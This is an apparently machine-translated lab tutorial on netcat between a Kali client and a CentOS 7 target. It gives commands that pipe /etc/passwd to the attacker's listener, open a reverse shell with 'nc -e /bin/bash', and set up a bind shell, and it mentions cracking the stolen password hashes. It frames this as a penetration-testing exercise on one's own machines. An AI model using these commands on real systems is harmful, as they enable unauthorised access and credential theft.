nc Installation and simple operation of
one . download nc( Here I use yum Download of source )
command : yum install -y nc

two . Realize connection communication operation
( I use two virtual machines here to communicate with each other , Respectively contos 7 x86 edition and kali 2022 edition , Here you can contos As a target ,kali As client )

1. lookup kali of ip address
command :ifconfig

2. utilize nc Open the port to listen ( Here I open 9999 port )
command :nc -lnvp 9999

That means you've started listening .

3. open contos 7 connect kali
command :nc 9999

input hello world Back carriage return Then we open kali, again kali See the listening result in

three . Transfer file contents
1. On the client (kali) Create a file 1.txt, User acceptance communication
command :nc -lvp 9999 >1.txt

2. On the server (contos 7) Transfer server password
command :nc 9999 < /etc/passwd
( If permissions are insufficient , Please learn the loophole recurrence in the previous article , I told you how to operate )

3. Observe whether the client has files transferred in
command :cat 1.txt

So how do we make sure that the transmitted content is just heard ?

4. View server (contos 7 in /etc/paaswd folder ) Compare .
command :cat /etc/passwd

Summary : Found by comparison , Data is consistent , So in the penetration test , If you communicate with the other host , Then you can get the file and crack it ,
promote : You guys can run two virtual machines for experiments like me , Do not connect to other hosts for communication without authorization .
Getting passwords is the same , Hash cracking after obtaining the file , Not here .

four . obtain shell( Control authority )
1. reverse shell
(1) Listening port (kali Medium input )
command :nc -lvp 9999
(2) adopt contos connect shell
command :nc 9999 -e /bin/bash

(3)Kali To see if the shell authority

2. Forward shell
(1) open contos Monitoring of
command :nc -lvp 6666 -e /bin/bash

(2) check contos of ip
command :ip -a
It's very simple here
(3)Kali Connect

Here we can see that the connection is OK , Other operations are the same as before .

That's all for today


©2019-2020 Toolsou All rights reserved,
C++ of string of compare usage Python Study notes ( one )evo Tool usage problems ——Degenerate covariance rank, Umeyama alignment is not possibleRISC-V_GD32VF103-TIMER0 timer interrupt java Array subscript variable _Java Basic grammar : array be based on stm32 Control four-wheel trolley motor drive ( one ) be based on redis Design of liking function Software engineering career planning mysql Query random data by conditions _MySQL Random query of several qualified records centos7 install RabbitMq